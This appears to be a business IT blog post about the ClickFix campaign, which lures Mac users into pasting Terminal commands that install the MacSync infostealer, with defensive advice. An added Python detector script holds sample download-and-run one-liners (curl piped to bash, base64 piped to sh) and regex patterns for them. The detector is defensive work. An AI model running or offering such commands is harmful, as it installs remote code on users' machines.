There is a common myth that keeps doing the rounds: “Macs don’t get viruses.” Unfortunately, that has never been entirely true, and a new wave of attacks reported by security researchers at Sophos makes the point louder than ever. A malware campaign known as “ClickFix” is now actively targeting macOS users, and it is spreading a nasty piece of software called the MacSync infostealer.
If your business uses Macs alongside Windows machines (and many do), this is one to pay attention to.
What is ClickFix?
ClickFix is not a traditional virus that sneaks in through a software vulnerability. Instead, it relies on good old-fashioned trickery. Attackers set up convincing fake websites and use sponsored Google search results to lure people in. Victims are then shown step-by-step instructions that persuade them to open the macOS Terminal app and paste in a command.
Because the user is the one actually running the command, many traditional security tools struggle to catch it. The attack does not exploit a bug in macOS itself. It exploits trust and human behaviour.
How Does the Attack Work?
Researchers observed several variations of the campaign between November 2025 and February 2026. Here is the general pattern:
1. Fake search results: Attackers bought sponsored Google ads for searches like “ChatGPT Atlas.” These ads appeared above the genuine results and led to fake websites designed to look like legitimate software download pages.
2. Convincing branding: The fake sites mimicked well-known brands such as OpenAI, and in some cases even used shared conversations on the real ChatGPT platform to add credibility.
3. Terminal command trick: Victims were told to open Terminal and paste a command to “install” or “optimise” their Mac. That command actually downloaded the MacSync malware in the background.
4. Password prompt: Once running, the malware asked for the user’s macOS password, giving it wide access to the system.
What Does MacSync Actually Steal?
Quite a lot, unfortunately. The latest version of MacSync is designed to hoover up a wide range of sensitive data, including: browser passwords, cookies, and saved form data from Chrome and Firefox-based browsers; macOS Keychain databases (where your saved passwords and certificates live); SSH keys, AWS credentials, and Kubernetes configuration files; documents from your Desktop, Documents, and Downloads folders; cryptocurrency wallet data and browser extensions; Telegram and Safari session data.
All of this gets bundled up into a ZIP file and sent back to the attackers. The malware can even tamper with cryptocurrency wallet applications like Ledger Live in an attempt to steal recovery phrases.
Why This Matters for Your Business
For years, Mac users have enjoyed a reputation for being “safer” than their Windows counterparts. And while macOS does have strong built-in security features, attackers have noticed that Apple’s growing market share makes Mac users a worthwhile target. This campaign is proof of that shift.
The key takeaway is that the attack works by tricking people, not by breaking software. That means no operating system is immune. Whether your team uses Windows, macOS, or a mix of both, the same principles of cyber awareness apply.
How to Protect Yourself and Your Team
Never run Terminal commands from a website. No legitimate software provider will ever ask you to open Terminal and paste a command to install their product. If you see this, close the page immediately.
Be cautious with sponsored search results. Attackers are increasingly buying ad space on Google to push malicious links above genuine results. Always double-check the URL before clicking.
Use endpoint protection on Macs too. Just as you would on a Windows machine, make sure your Macs have proper security software installed and kept up to date.
Keep your team informed. Regular cyber awareness training is one of the most effective defences. If your staff know what a social engineering attack looks like, they are far less likely to fall for one.
Download software from official sources only. Always go directly to the vendor’s website or the Mac App Store. Avoid downloading software from links found through search ads or unfamiliar websites.
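A defender-side check for the Terminal command trick described above, as an added example that is not part of the original article or the Sophos research: it scans shell history lines for generic download-and-run command shapes. The rule patterns, the scan_history function and the sample history are constructed assumptions, not indicators taken from the campaign.

```python
import re
import sys
from pathlib import Path

# Generic "download and run" shapes (assumed heuristics, not campaign IoCs).
FETCH = r"\b(?:curl|wget)\b"
SHELL = r"(?:(?:ba|z|da)?sh|osascript)\b"
PIPE_TO_SHELL = rf"\|\s*(?:sudo\s+)?(?:\S*/)?{SHELL}"
RULES = [
    # curl ... | bash
    ("fetch-piped-to-interpreter", re.compile(rf"{FETCH}[^|]*{PIPE_TO_SHELL}")),
    # bash -c "$(curl ...)"  or  bash <(curl ...)
    ("interpreter-runs-fetched-output",
     re.compile(rf"(?<![\w.-]){SHELL}\s+(?:-c\s+)?[\"']?(?:\$\(|<\(|`)\s*{FETCH}")),
    # ... | base64 -D | sh
    ("decoded-blob-piped-to-interpreter",
     re.compile(rf"base64\s+(?:-d|-D|--decode)\b[^|]*{PIPE_TO_SHELL}")),
]

# Constructed sample history (plain and zsh extended-history formats).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    ": 1764000000:0;curl -fsSL https://downloads.example.invalid/setup.sh | bash",
    "curl -O https://example.invalid/report.pdf",
    '/bin/zsh -c "$(curl -fsSL https://example.invalid/optimise)"',
    "echo Y29uc3RydWN0ZWQ= | base64 -D | sh",
    "curl -s https://example.invalid/file.txt | shasum -a 256",
    "git push origin main",
]


def scan_history(lines):
    """Return (line_number, rule_name, command) for each suspicious entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name, line.strip()))
                break  # one label per line is enough for triage
    return hits


if __name__ == "__main__":
    # Optional argument: path to a history file such as ~/.zsh_history.
    if len(sys.argv) > 1:
        lines = Path(sys.argv[1]).read_text(errors="replace").splitlines()
    else:
        lines = SAMPLE_HISTORY
    for n, rule, cmd in scan_history(lines):
        print(f"line {n}: {rule}: {cmd}")
```

Developer tools are sometimes installed with one-liners of the same shape, so hits are leads for review rather than verdicts.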
The days of assuming Macs are safe from malware are behind us. Attackers go where the users are, and as Apple devices become more popular in homes and offices alike, the threats will keep coming. The good news is that staying safe does not require anything complicated. A healthy dose of scepticism, good security software, and a team that knows what to look out for will go a long way.
If you would like help reviewing the security of your Mac (or Windows) devices, or if you want to arrange cyber awareness training for your team, get in touch. We are always happy to help.


